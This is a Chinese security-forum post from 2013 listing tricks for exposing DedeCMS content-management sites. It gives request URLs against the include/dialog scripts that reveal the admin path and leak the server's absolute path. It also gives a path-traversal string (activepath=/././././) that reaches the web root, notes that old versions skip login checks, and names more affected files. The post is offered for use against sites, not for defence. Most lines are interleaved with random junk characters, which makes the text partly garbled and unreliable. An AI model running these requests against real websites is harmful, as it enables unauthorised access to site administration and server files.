找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2240|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理; o1 w4 Z1 o; C

  u& Y$ s! _' c% L  R( L员帐号,新版本的就直接转向了后台.. c' _: i' I8 |

7 z& h# _. }/ \( v. G! @. Z2.include/dialog/config.php会爆出后台管理路径
8 y$ X$ T5 S7 g; p4 O/ N( P0 @3 B; Y  K6 ^5 M$ y6 i- g
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录3 n. B  \, Y8 Y$ q) G/ x

% f* k% Z7 |7 Z4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
9 i5 N& Z  e; R  k" x0 f. B
$ M; t+ v1 g% @5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉2 `/ U8 k, w* z

& M9 L* n. M& Q5 r4 U& m: h到根目录去.不过这些版本的访问地址有些不同.. `0 ^% ^1 g4 c. |% ~6 }
地址为require/dialog/select_soft.php?activepath=/././././././././
$ X4 V5 @" I2 G2 b. S8 C6 u* i
8 Z! A  E/ X1 M$ m: S5 Iinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..3 X' ^* |/ c  a1 y& W
存在相同问题的文件还有3 |7 k$ V$ x: A' `( l- Y  V5 v
include\dialog\select_images.php1 q* W: L7 ]( ~7 l2 c
include\dialog\select_media.php
# ^/ n9 S  x" `include\dialog\select_templets.php​
1 `" f+ f# I5 z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表